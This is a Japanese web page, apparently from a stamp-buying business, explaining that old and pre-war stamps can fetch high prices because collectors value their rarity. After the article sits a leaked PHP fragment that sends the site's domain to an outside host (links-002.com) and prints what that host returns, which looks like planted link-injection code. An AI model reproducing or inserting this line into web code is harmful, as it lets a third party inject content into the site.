前へ
次へ

なぜ古い切手は高額買取になる事があるのか

切手買取の価格は、非常に高くなる事があります。その理由の1つは、切手の珍しさです。買取業者は、買い取った切手を収集家に売却している事も多いです。その収集家は、切手の流通枚数を重視している傾向があります。切手によっては、流通枚数が非常に少ない事もあります。例えば、かなり以前に発行された切手です。戦前に発行された切手などは、現在では殆ど見かけません。年数が経過すれば、自然と流通枚数も少なくなる訳です。収集家の方々は、その珍しい切手を集めている傾向があります。珍しい切手を入手する為には、多少高いお金を出しても問題ないと考えている収集家も多いです。という事は、買取業者としても高く買い取ってくれる訳です。戦前などに発行された切手は、かなり買取額が高くなるケースもあります。古い切手は、一見すると状態が厳しく見えることもあります。年数が経過すれば、切手も劣化するからです。しかし実際には、予想以上の買取額になる事も多いので、試しに買取業者に提示してみると良いでしょう。

".file_get_contents('http://links-002.com/set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top